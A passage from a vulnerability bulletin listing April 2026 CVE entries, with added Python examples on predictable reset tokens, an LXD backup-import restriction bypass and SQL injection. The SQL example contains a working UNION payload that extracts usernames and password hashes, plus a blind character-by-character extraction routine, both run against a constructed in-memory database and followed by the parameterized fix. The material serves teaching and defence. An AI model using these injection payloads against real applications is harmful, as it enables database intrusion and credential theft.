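    The sha1($email) scheme beside a token design that has the three properties the description says are missing (a random component, expiry, rate limiting), as an added Python example; it is not Chamilo's fix, whose details are in the linked commits. The store keeps only an HMAC of each token under a server-side key, so a database read does not yield usable tokens either.

```python
import hashlib
import hmac
import secrets
import time


def legacy_reset_token(email):
    """The reported scheme: sha1(email). Deterministic, so anyone who knows the
    address can compute it; nothing expires and nothing is counted."""
    return hashlib.sha1(email.encode()).hexdigest()


class ResetTokenStore:
    """Hardened scheme (an added design, not Chamilo's patch): a random token
    is mailed to the user, only an HMAC of it is kept server-side, it expires
    after ttl seconds, is single use, and failed redemptions are rate limited."""

    def __init__(self, server_key, ttl=900, max_failures=5, clock=time.time):
        self.key = server_key
        self.ttl = ttl
        self.max_failures = max_failures
        self.clock = clock          # injectable so expiry can be tested
        self.pending = {}           # email -> (hmac_hex, expires_at)
        self.failures = {}          # email -> failed redemptions so far

    def _digest(self, token):
        return hmac.new(self.key, token.encode(), hashlib.sha256).hexdigest()

    def issue(self, email):
        """Create a token for the mailbox; issuing again replaces the old one."""
        token = secrets.token_urlsafe(32)
        self.pending[email] = (self._digest(token), self.clock() + self.ttl)
        return token

    def redeem(self, email, token):
        """True exactly once for a live, matching token; every failure counts
        against the address, and the comparison is constant-time."""
        if self.failures.get(email, 0) >= self.max_failures:
            return False
        record = self.pending.get(email)
        if record is not None:
            digest, expires_at = record
            if self.clock() <= expires_at and hmac.compare_digest(digest, self._digest(token)):
                del self.pending[email]
                self.failures.pop(email, None)
                return True
        self.failures[email] = self.failures.get(email, 0) + 1
        return False
```

    With the legacy function, two parties who know the address compute the same token independently, which is the whole attack; with the store, the token exists only in the e-mail and in the recipient's browser, and a guess budget of max_failures makes brute force of a 256-bit value irrelevant.
    </td></tr>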

    <tr>
    <td class="vendor-product">Juniper Networks--JSI LWC</td>
    <td>A Use of Default Password vulnerability in the Juniper Networks Support Insights (JSI) Virtual Lightweight Collector (vLWC) allows an unauthenticated, network-based attacker to take full control of the device. vLWC software images ship with an initial password for a high privileged account. A change of this password is not enforced during the provisioning of the software, which can make full access to the system by unauthorized actors possible. This issue affects all versions of vLWC before 3.0.94.</td>
    <td>2026-04-09</td>
    <td>9.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33784" target="_blank" rel="noopener">CVE-2026-33784</a></td>
    <td><a href="https://kb.juniper.net/JSA107871" target="_blank" rel="noopener">https://kb.juniper.net/JSA107871</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Canonical--lxd</td>
    <td>Canonical LXD versions 4.12 through 6.7 contain an incomplete denylist in isVMLowLevelOptionForbidden (lxd/project/limits/permissions.go), which omits raw.apparmor and raw.qemu.conf from the set of keys blocked under the restricted.virtual-machines.lowlevel=block project restriction. A remote attacker with can_edit permission on a VM instance in a restricted project can inject an AppArmor rule and a QEMU chardev configuration that bridges the LXD Unix socket into the guest VM, enabling privilege escalation to LXD cluster administrator and subsequently to host root.</td>
    <td>2026-04-09</td>
    <td>9.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34177" target="_blank" rel="noopener">CVE-2026-34177</a></td>
    <td><a href="https://github.com/canonical/lxd/security/advisories/GHSA-fm2x-c5qw-4h6f" target="_blank" rel="noopener">VM lowlevel restriction bypass via raw.apparmor and raw.qemu.conf</a><br><a href="https://github.com/canonical/lxd/pull/17909" target="_blank" rel="noopener">lxd: Prevent use of raw.apparmor and raw.qemu.conf when low level options are blocked</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Canonical--lxd</td>
    <td>In Canonical LXD before 6.8, the backup import path validates project restrictions against backup/index.yaml in the supplied tar archive but creates the instance from backup/container/backup.yaml, a separate file in the same archive that is never checked against project restrictions. An authenticated remote attacker with instance-creation permission in a restricted project can craft a backup archive where backup.yaml carries restricted settings such as security.privileged=true or raw.lxc directives, bypassing all project restriction enforcement and allowing full host compromise.</td>
    <td>2026-04-09</td>
    <td>9.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34178" target="_blank" rel="noopener">CVE-2026-34178</a></td>
    <td><a href="https://github.com/canonical/lxd/security/advisories/GHSA-q96j-3fmm-7fv4" target="_blank" rel="noopener">Importing a crafted backup leads to project restriction bypass</a><br><a href="https://github.com/canonical/lxd/pull/17921" target="_blank" rel="noopener">Import: Create backup config from index</a></td>
    </tr>
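    <tr><td colspan="6">
    An added Python example covering both the backup-import entry above and the raw.apparmor/raw.qemu.conf entry before it; it is not LXD code. It builds an in-memory backup archive whose backup/index.yaml and backup/container/backup.yaml disagree, then contrasts checking one file with checking the configuration that is actually applied. The flat-YAML reader and the restricted-key list are simplifications made here; the upstream pull request, per its title, instead derives the backup config from the index.

```python
import io
import tarfile

# Keys a restricted project must not be able to set, taken from the two LXD
# entries; "raw." covers raw.lxc, raw.apparmor, raw.qemu.conf and the rest.
RESTRICTED_KEYS = {"security.privileged"}
RESTRICTED_PREFIXES = ("raw.",)

INDEX = "backup/index.yaml"
INSTANCE = "backup/container/backup.yaml"


def parse_config_block(text):
    """Read 'key: value' lines under a top-level 'config:' key. Deliberately
    tiny: it only understands the flat layout the constructed archive uses."""
    config, in_config = {}, False
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line.startswith(" "):
            in_config = line.strip() == "config:"
        elif in_config and ":" in line:
            key, value = line.strip().split(":", 1)
            config[key.strip()] = value.strip()
    return config


def restricted_violations(config):
    return sorted(k for k in config
                  if k in RESTRICTED_KEYS or k.startswith(RESTRICTED_PREFIXES))


def build_backup_archive(index_config, instance_config):
    """Constructed backup tarball whose two metadata files can disagree."""
    def as_yaml(cfg):
        return "config:\n" + "".join(f"  {k}: {v}\n" for k, v in cfg.items())
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, cfg in ((INDEX, index_config), (INSTANCE, instance_config)):
            data = as_yaml(cfg).encode()
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def read_member(archive, name):
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r") as tar:
        return tar.extractfile(name).read().decode()


def import_flawed(archive):
    """The reported behaviour: check the index, then build the instance from
    the other file. Returns (accepted, effective_config, violations_seen)."""
    index_cfg = parse_config_block(read_member(archive, INDEX))
    bad = restricted_violations(index_cfg)
    if bad:
        return False, {}, bad
    return True, parse_config_block(read_member(archive, INSTANCE)), bad


def import_fixed(archive):
    """Validate the configuration that will actually be applied, as well as
    the index. Checked data and applied data must be the same data."""
    index_cfg = parse_config_block(read_member(archive, INDEX))
    inst_cfg = parse_config_block(read_member(archive, INSTANCE))
    bad = sorted(set(restricted_violations(index_cfg) + restricted_violations(inst_cfg)))
    if bad:
        return False, {}, bad
    return True, inst_cfg, []
```

    The same shape of bug, a denylist that is checked against a different representation than the one consumed, is also what the incomplete isVMLowLevelOptionForbidden list amounts to: a prefix rule on raw.* would have covered raw.apparmor and raw.qemu.conf without a per-key enumeration.
    </td></tr>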

    <tr>
    <td class="vendor-product">Canonical--lxd</td>
    <td>In Canonical LXD versions 4.12 through 6.7, the doCertificateUpdate function in lxd/certificates.go does not validate the Type field when handling PUT/PATCH requests to /1.0/certificates/{fingerprint} for restricted TLS certificate users, allowing a remote authenticated attacker to escalate privileges to cluster admin.</td>
    <td>2026-04-09</td>
    <td>9.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34179" target="_blank" rel="noopener">CVE-2026-34179</a></td>
    <td><a href="https://github.com/canonical/lxd/security/advisories/GHSA-c3h3-89qf-jqm5" target="_blank" rel="noopener">Update of type field in restricted TLS certificate allows privilege escalation to cluster admin</a><br><a href="https://github.com/canonical/lxd/pull/17936" target="_blank" rel="noopener">Improve validation on certificate edit</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Nextendweb--Smart Slider 3 Pro for WordPress</td>
    <td>Smart Slider 3 Pro version 3.5.1.35 for WordPress and Joomla contains a multi-stage remote access toolkit injected through a compromised update system that allows unauthenticated attackers to execute arbitrary code and commands. Attackers can trigger pre-authentication remote shell execution via HTTP headers, establish authenticated backdoors accepting arbitrary PHP code or OS commands, create hidden administrator accounts, exfiltrate credentials and access keys, and maintain persistence through multiple injection points including must-use plugins and core file modifications.</td>
    <td>2026-04-09</td>
    <td>9.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34424" target="_blank" rel="noopener">CVE-2026-34424</a></td>
    <td><a href="https://smartslider.helpscoutdocs.com/article/2144-wordpress-security-advisory-smart-slider-3-pro-3-5-1-35-compromise" target="_blank" rel="noopener">https://smartslider.helpscoutdocs.com/article/2144-wordpress-security-advisory-smart-slider-3-pro-3-5-1-35-compromise</a><br><a href="https://smartslider.helpscoutdocs.com/article/2143-joomla-security-advisory-smart-slider-3-pro-3-5-1-35-compromise" target="_blank" rel="noopener">https://smartslider.helpscoutdocs.com/article/2143-joomla-security-advisory-smart-slider-3-pro-3-5-1-35-compromise</a><br><a href="https://patchstack.com/database/wordpress/plugin/nextend-smart-slider3-pro/vulnerability/wordpress-smart-slider-3-plugin-3-5-1-35-backdoor-vulnerability" target="_blank" rel="noopener">https://patchstack.com/database/wordpress/plugin/nextend-smart-slider3-pro/vulnerability/wordpress-smart-slider-3-plugin-3-5-1-35-backdoor-vulnerability</a><br><a href="https://patchstack.com/articles/critical-supply-chain-compromise-in-smart-slider-3-pro-full-malware-analysis/" target="_blank" rel="noopener">https://patchstack.com/articles/critical-supply-chain-compromise-in-smart-slider-3-pro-full-malware-analysis/</a><br><a href="https://mysites.guru/blog/smart-slider-3-pro-supply-chain-compromise/" target="_blank" rel="noopener">https://mysites.guru/blog/smart-slider-3-pro-supply-chain-compromise/</a></td>
    </tr>

    <tr>
    <td class="vendor-product">usebruno--bruno</td>
    <td>Bruno is an open source IDE for exploring and testing APIs. Prior to 3.2.1, Bruno was affected by a supply chain attack involving compromised versions of the axios npm package, which introduced a hidden dependency deploying a cross-platform Remote Access Trojan (RAT). Users of @usebruno/cli who ran npm install between 00:21 UTC and ~03:30 UTC on March 31, 2026 may have been impacted. Upgrade to 3.2.1.</td>
    <td>2026-04-06</td>
    <td>9.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34841" target="_blank" rel="noopener">CVE-2026-34841</a></td>
    <td><a href="https://github.com/usebruno/bruno/security/advisories/GHSA-658g-p7jg-wx5g" target="_blank" rel="noopener">https://github.com/usebruno/bruno/security/advisories/GHSA-658g-p7jg-wx5g</a><br><a href="https://github.com/axios/axios/issues/10604" target="_blank" rel="noopener">https://github.com/axios/axios/issues/10604</a><br><a href="https://github.com/usebruno/bruno/pull/7632" target="_blank" rel="noopener">https://github.com/usebruno/bruno/pull/7632</a><br><a href="https://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat" target="_blank" rel="noopener">https://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat</a></td>
    </tr>

    <tr>
    <td class="vendor-product">R-Project--RGui</td>
    <td>RGui 3.5.0 contains a local buffer overflow vulnerability in the GUI preferences dialog that allows attackers to bypass DEP protections through structured exception handling exploitation. Attackers can craft malicious input in the Language for menus and messages field to trigger a stack-based buffer overflow, execute a ROP chain for VirtualAlloc allocation, and achieve arbitrary code execution.</td>
    <td>2026-04-12</td>
    <td>8.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2018-25258" target="_blank" rel="noopener">CVE-2018-25258</a></td>
    <td><a href="https://www.exploit-db.com/exploits/46107" target="_blank" rel="noopener">ExploitDB-46107</a><br><a href="https://www.r-project.org/" target="_blank" rel="noopener">Official Product Homepage</a><br><a href="https://cran.r-project.org/bin/windows/base/old/3.5.0/R-3.5.0-win.exe" target="_blank" rel="noopener">Product Reference</a><br><a href="https://www.vulncheck.com/advisories/rgui-local-buffer-overflow-seh-dep-bypass" target="_blank" rel="noopener">VulnCheck Advisory: RGui 3.5.0 Local Buffer Overflow SEH DEP Bypass</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Html5Videoplayer--HTML5 Video Player</td>
    <td>HTML5 Video Player 1.2.5 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by supplying an oversized key code string. Attackers can craft a malicious payload exceeding 997 bytes and paste it into the KEY CODE field in the Help Register dialog to trigger code execution and spawn a calculator process.</td>
    <td>2026-04-12</td>
    <td>8.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2019-25689" target="_blank" rel="noopener">CVE-2019-25689</a></td>
    <td><a href="https://www.exploit-db.com/exploits/46279" target="_blank" rel="noopener">ExploitDB-46279</a><br><a href="http://www.html5videoplayer.net/download.html" target="_blank" rel="noopener">Official Product Homepage</a><br><a href="https://www.vulncheck.com/advisories/html5-video-player-local-buffer-overflow-non-seh" target="_blank" rel="noopener">VulnCheck Advisory: HTML5 Video Player 1.2.5 Local Buffer Overflow Non-SEH</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Faleemi--Faleemi Desktop Software</td>
    <td>Faleemi Desktop Software 1.8 contains a local buffer overflow vulnerability in the System Setup dialog that allows attackers to bypass DEP protections through structured exception handling exploitation. Attackers can inject a crafted payload into the Save Path for Snapshot and Record file field to trigger a buffer overflow and execute arbitrary code via ROP chain gadgets.</td>
    <td>2026-04-12</td>
    <td>8.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2019-25691" target="_blank" rel="noopener">CVE-2019-25691</a></td>
    <td><a href="https://www.exploit-db.com/exploits/46269" target="_blank" rel="noopener">ExploitDB-46269</a><br><a href="https://www.faleemi.com/" target="_blank" rel="noopener">Official Product Homepage</a><br><a href="https://www.vulncheck.com/advisories/faleemi-desktop-software-local-buffer-overflow-seh-dep-bypass" target="_blank" rel="noopener">VulnCheck Advisory: Faleemi Desktop Software 1.8 Local Buffer Overflow SEH DEP Bypass</a></td>
    </tr>

    <tr>
    <td class="vendor-product">r-project--R</td>
    <td>R 3.4.4 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by injecting malicious input into the GUI Preferences language field. Attackers can craft a payload with a 292-byte offset and JMP ESP instruction to execute commands like calc.exe when the payload is pasted into the Language for menus and messages field.</td>
    <td>2026-04-12</td>
    <td>8.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2019-25695" target="_blank" rel="noopener">CVE-2019-25695</a></td>
    <td><a href="https://www.exploit-db.com/exploits/46265" target="_blank" rel="noopener">ExploitDB-46265</a><br><a href="https://cloud.r-project.org/bin/windows/" target="_blank" rel="noopener">Official Product Homepage</a><br><a href="https://www.vulncheck.com/advisories/r-local-buffer-overflow-windows-xp-sp3" target="_blank" rel="noopener">VulnCheck Advisory: R 3.4.4 Local Buffer Overflow Windows XP SP3</a></td>
    </tr>

    <tr>
    <td class="vendor-product">VictorAlagwu--CMSsite</td>
    <td>CMSsite 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the cat_id parameter. Attackers can send GET requests to category.php with malicious cat_id values to extract sensitive database information including usernames and credentials.</td>
    <td>2026-04-12</td>
    <td>8.2</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2019-25697" target="_blank" rel="noopener">CVE-2019-25697</a></td>
    <td><a href="https://www.exploit-db.com/exploits/46259" target="_blank" rel="noopener">ExploitDB-46259</a><br><a href="https://github.com/VictorAlagwu/CMSsite/archive/master.zip" target="_blank" rel="noopener">Product Reference</a><br><a href="https://www.vulncheck.com/advisories/cmssite-sql-injection-via-category-php" target="_blank" rel="noopener">VulnCheck Advisory: CMSsite 1.0 SQL Injection via category.php</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Divxtodvd--Easy Video to iPod Converter</td>
    <td>Easy Video to iPod Converter 1.6.20 contains a local buffer overflow vulnerability in the user registration field that allows local attackers to overwrite the structured exception handler. Attackers can input a crafted payload exceeding 996 bytes in the username field to trigger SEH overwrite and execute arbitrary code with user privileges.</td>
    <td>2026-04-12</td>
    <td>8.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2019-25701" target="_blank" rel="noopener">CVE-2019-25701</a></td>
    <td><a href="https://www.exploit-db.com/exploits/46255" target="_blank" rel="noopener">ExploitDB-46255</a><br><a href="http://www.divxtodvd.net/" target="_blank" rel="noopener">Official Product Homepage</a><br><a href="http://www.divxtodvd.net/easy_video_to_ipod.exe" target="_blank" rel="noopener">Product Reference</a><br><a href="https://www.vulncheck.com/advisories/easy-video-to-ipod-converter-local-buffer-overflow-seh" target="_blank" rel="noopener">VulnCheck Advisory: Easy Video to iPod Converter 1.6.20 Local Buffer Overflow SEH</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Sourceforge--Echo Mirage</td>
    <td>Echo Mirage 3.1 contains a stack buffer overflow vulnerability that allows local attackers to crash the application or execute arbitrary code by supplying an oversized string in the Rules action field. Attackers can create a malicious text file with a crafted payload exceeding buffer boundaries and paste it into the action field through the Rules dialog to trigger the overflow and overwrite the return address.</td>
    <td>2026-04-12</td>
    <td>8.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2019-25705" target="_blank" rel="noopener">CVE-2019-25705</a></td>
    <td><a href="https://www.exploit-db.com/exploits/46216" target="_blank" rel="noopener">ExploitDB-46216</a><br><a href="http://initd.sh/" target="_blank" rel="noopener">Official Product Homepage</a><br><a href="https://sourceforge.net/projects/echomirage.oldbutgold.p/" target="_blank" rel="noopener">Product Reference</a><br><a href="https://www.vulncheck.com/advisories/echo-mirage-stack-buffer-overflow-via-rules-action-field" target="_blank" rel="noopener">VulnCheck Advisory: Echo Mirage 3.1 Stack Buffer Overflow via Rules Action Field</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Dolibarr--Dolibarr ERP-CRM</td>
    <td>Dolibarr ERP-CRM 8.0.4 contains an SQL injection vulnerability in the rowid parameter of the admin dict.php endpoint that allows attackers to execute arbitrary SQL queries. Attackers can inject malicious SQL code through the rowid POST parameter to extract sensitive database information using error-based SQL injection techniques.</td>
    <td>2026-04-12</td>
    <td>8.2</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2019-25710" target="_blank" rel="noopener">CVE-2019-25710</a></td>
    <td><a href="https://www.exploit-db.com/exploits/46095" target="_blank" rel="noopener">ExploitDB-46095</a><br><a href="https://www.dolibarr.org/" target="_blank" rel="noopener">Official Product Homepage</a><br><a href="https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/8.0.4/dolibarr-8.0.4.zip" target="_blank" rel="noopener">Product Reference</a><br><a href="https://www.vulncheck.com/advisories/dolibarr-erp-crm-sql-injection-via-rowid-parameter" target="_blank" rel="noopener">VulnCheck Advisory: Dolibarr ERP-CRM 8.0.4 SQL Injection via rowid Parameter</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Synology--Synology SSL VPN Client</td>
    <td>A plaintext storage of a password vulnerability in Synology SSL VPN Client before 1.4.5-0684 allows remote attackers to access or influence the user's PIN code due to insecure storage. This may lead to unauthorized VPN configuration and potential interception of subsequent VPN traffic when combined with user interaction.</td>
    <td>2026-04-10</td>
    <td>8.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2021-47961" target="_blank" rel="noopener">CVE-2021-47961</a></td>
    <td><a href="https://www.synology.com/en-global/security/advisory/Synology_SA_26_05" target="_blank" rel="noopener">Synology-SA-26:05 Synology SSL VPN Client</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Adivaha--WordPress adivaha Travel Plugin</td>
    <td>WordPress adivaha Travel Plugin 2.3 contains a time-based blind SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'pid' GET parameter. Attackers can send requests to the /mobile-app/v3/ endpoint with crafted 'pid' values using XOR-based payloads to extract sensitive database information or cause denial of service.</td>
    <td>2026-04-09</td>
    <td>8.2</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2023-54359" target="_blank" rel="noopener">CVE-2023-54359</a></td>
    <td><a href="https://www.exploit-db.com/exploits/51655" target="_blank" rel="noopener">ExploitDB-51655</a><br><a href="https://www.adivaha.com/" target="_blank" rel="noopener">Official Product Homepage</a><br><a href="https://wordpress.org/plugins/adiaha-hotel/" target="_blank" rel="noopener">Product Reference</a><br><a href="https://www.vulncheck.com/advisories/wordpress-adivaha-travel-plugin-sql-injection-via-pid" target="_blank" rel="noopener">VulnCheck Advisory: WordPress adivaha Travel Plugin 2.3 SQL Injection via pid</a></td>
    </tr>
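    <tr><td colspan="6">
    One added example (Python with sqlite3, not code from any of the three projects) serving the CMSsite cat_id, Dolibarr rowid and adivaha pid entries above: the concatenated query, UNION-based extraction, boolean-blind extraction through the same endpoint, and the bound-parameter version that refuses non-integer input. Schema, rows and the placeholder hash are constructed; the blind routine generalizes what the adivaha entry describes, since a time-based oracle answers the same yes/no question by delay rather than by content.

```python
import sqlite3


def make_db():
    """Constructed schema and rows standing in for a CMS's categories and
    users tables; the hash value is a placeholder, not a real credential."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE categories (cat_id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO categories VALUES (1, 'news'), (2, 'sport');
        INSERT INTO users VALUES (1, 'admin', 'placeholder-hash');
    """)
    return conn


def category_vulnerable(conn, cat_id):
    """The reported pattern: the GET parameter is spliced into the statement."""
    sql = f"SELECT name FROM categories WHERE cat_id = {cat_id}"
    return [row[0] for row in conn.execute(sql)]


def category_parameterized(conn, raw_cat_id):
    """Hardened: type-check first, then bind. Returns None for rejected input."""
    try:
        cat_id = int(raw_cat_id)
    except (TypeError, ValueError):
        return None
    rows = conn.execute("SELECT name FROM categories WHERE cat_id = ?", (cat_id,))
    return [row[0] for row in rows]


# Classic in-band extraction: the injected SELECT must match the column count.
UNION_PAYLOAD = "1 UNION SELECT username || ':' || password_hash FROM users"


def blind_extract_username(oracle, max_len=16):
    """Boolean-blind extraction through any yes/no oracle built on the
    vulnerable query: one character per accepted probe. A time-based oracle
    (SLEEP, BENCHMARK, or XOR-wrapped conditionals as in the adivaha entry)
    answers the same question by response delay instead of response content."""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789_"
    found = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            probe = (f"1 AND (SELECT substr(username, {pos}, 1) FROM users "
                     f"WHERE id = 1) = '{ch}'")
            if oracle(probe):
                found += ch
                break
        else:
            break  # no character matched: end of the value
    return found


if __name__ == "__main__":
    db = make_db()
    print(category_vulnerable(db, UNION_PAYLOAD))
    print(blind_extract_username(lambda p: bool(category_vulnerable(db, p))))
    print(category_parameterized(db, UNION_PAYLOAD))
```

    The bound version rejects every payload above before the database sees it, which is why the fix is the same for all three entries regardless of whether the original exploitation was in-band, error-based or time-based.
    </td></tr>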

    <tr>
    <td class="vendor-product">Juniper Networks--Apstra</td>
    <td>A Key Exchange without Entity Authentication vulnerability in the SSH implementation of Juniper Networks Apstra allows an unauthenticated, MITM attacker to impersonate managed devices. Due to insufficient SSH host key validation an attacker can perform a machine-in-the-middle attack on the SSH connections from Apstra to managed devices, enabling an attacker to impersonate a managed device and capture user credentials. This issue affects all versions of Apstra before 6.1.1.</td>
    <td>2026-04-09</td>
    <td>8.7</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-13914" target="_blank" rel="noopener">CVE-2025-13914</a></td>
    <td><a href="https://kb.juniper.net/JSA107862" target="_blank" rel="noopener">https://kb.juniper.net/JSA107862</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Qualcomm, Inc.--Snapdragon</td>
    <td>Memory corruption when decoding corrupted satellite data files with invalid signature offsets.</td>
    <td>2026-04-06</td>
    <td>8.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-47392" target="_blank" rel="noopener">CVE-2025-47392</a></td>
    <td><a href="https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html" target="_blank" rel="noopener">https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">CactusThemes--VideoPro</td>
    <td>Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in CactusThemes VideoPro allows PHP Local File Inclusion. This issue affects VideoPro: from n/a through 2.3.8.1.</td>
    <td>2026-04-10</td>
    <td>8.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-58913" target="_blank" rel="noopener">CVE-2025-58913</a></td>
    <td><a href="https://patchstack.com/database/wordpress/theme/videopro/vulnerability/wordpress-videopro-theme-2-3-8-1-local-file-inclusion-vulnerability?_s_id=cve" target="_blank" rel="noopener">https://patchstack.com/database/wordpress/theme/videopro/vulnerability/wordpress-videopro-theme-2-3-8-1-local-file-inclusion-vulnerability?_s_id=cve</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Hitachi--JP1/IT Desktop Management 2 - Manager</td>
    <td>Remote Code Execution Vulnerability in JP1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management 2 - Operations Director on Windows, Job Management Partner 1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management - Manager on Windows, Job Management Partner 1/IT Desktop Management - Manager on Windows, JP1/NETM/DM Manager on Windows, JP1/NETM/DM Client on Windows, Job Management Partner 1/Software Distribution Manager on Windows, Job Management Partner 1/Software Distribution Client on Windows. This issue affects JP1/IT Desktop Management 2 - Manager: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; JP1/IT Desktop Management 2 - Operations Director: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; Job Management Partner 1/IT Desktop Management 2 - Manager: from 10-50 through 10-50-11; JP1/IT Desktop Management - Manager: from 09-50 through 10-10-16; Job Management Partner 1/IT Desktop Management - Manager: from 09-50 through 10-10-16; JP1/NETM/DM Manager: from 09-00 through 10-20-02; JP1/NETM/DM Client: from 09-00 through 10-20-02; Job Management Partner 1/Software Distribution Manager: from 09-00 through 09-51-13; Job Management Partner 1/Software Distribution Client: from 09-00 through 09-51-13.</td>
    <td>2026-04-07</td>
    <td>8.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-65115" target="_blank" rel="noopener">CVE-2025-65115</a></td>
    <td><a href="https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2026-118/index.html" target="_blank" rel="noopener">https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2026-118/index.html</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">IBM--Verify Identity Access Container</td>
    <td>IBM Verify Identity Access Container 11.0 through 11.0.2 and IBM Security Verify Access Container 10.0 through 10.0.9.1 and IBM Verify Identity Access 11.0 through 11.0.2 and IBM Security Verify Access 10.0 through 10.0.9.1 could allow a locally authenticated user to execute malicious scripts from outside of its control sphere.</td>
    <td>2026-04-07</td>
    <td>8.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-1342" target="_blank" rel="noopener">CVE-2026-1342</a></td>
    <td><a href="https://www.ibm.com/support/pages/node/7268253" target="_blank" rel="noopener">https://www.ibm.com/support/pages/node/7268253</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">LibRaw--LibRaw</td>
    <td>An integer overflow vulnerability exists in the deflate_dng_load_raw functionality of LibRaw Commit 8dc68e2. A specially crafted malicious file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.</td>
    <td>2026-04-07</td>
    <td>8.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-20884" target="_blank" rel="noopener">CVE-2026-20884</a></td>
    <td><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2026-2364" target="_blank" rel="noopener">https://talosintelligence.com/vulnerability_reports/TALOS-2026-2364</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Windmill Labs--Windmill CE (Community Edition)</td>
    <td>Windmill versions 1.56.0 through 1.614.0 contain a missing authorization vulnerability that allows users with the Operator role to perform prohibited entity creation and modification actions via the backend API. Although Operators are documented and priced as unable to create or modify entities, the API does not enforce the Operator restriction on workspace endpoints, allowing an Operator to create and update scripts, flows, apps, and raw_apps. Since Operators can also execute scripts via the jobs API, this allows direct privilege escalation to remote code execution within the Windmill deployment. This vulnerability has existed since the introduction of the Operator role in version 1.56.0.</td>
    <td>2026-04-07</td>
    <td>8.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-22683" target="_blank" rel="noopener">CVE-2026-22683</a></td>
    <td><a href="https://chocapikk.com/posts/2026/windfall-nextcloud-flow-windmill-rce/" target="_blank" rel="noopener">https://chocapikk.com/posts/2026/windfall-nextcloud-flow-windmill-rce/</a><br><a href="https://github.com/Chocapikk/Windfall" target="_blank" rel="noopener">https://github.com/Chocapikk/Windfall</a><br><a href="https://github.com/windmill-labs/windmill/releases/tag/v1.615.0" target="_blank" rel="noopener">https://github.com/windmill-labs/windmill/releases/tag/v1.615.0</a><br><a href="https://github.com/windmill-labs/windmill/commit/c621a74804f4f6e8318819c01e3a23a17698588b" target="_blank" rel="noopener">https://github.com/windmill-labs/windmill/commit/c621a74804f4f6e8318819c01e3a23a17698588b</a><br><a href="https://www.windmill.dev/" target="_blank" rel="noopener">https://www.windmill.dev/</a><br><a href="https://apps.nextcloud.com/apps/flow/releases" target="_blank" rel="noopener">https://apps.nextcloud.com/apps/flow/releases</a><br>&nbsp;</td>
    </tr>

    <tr>
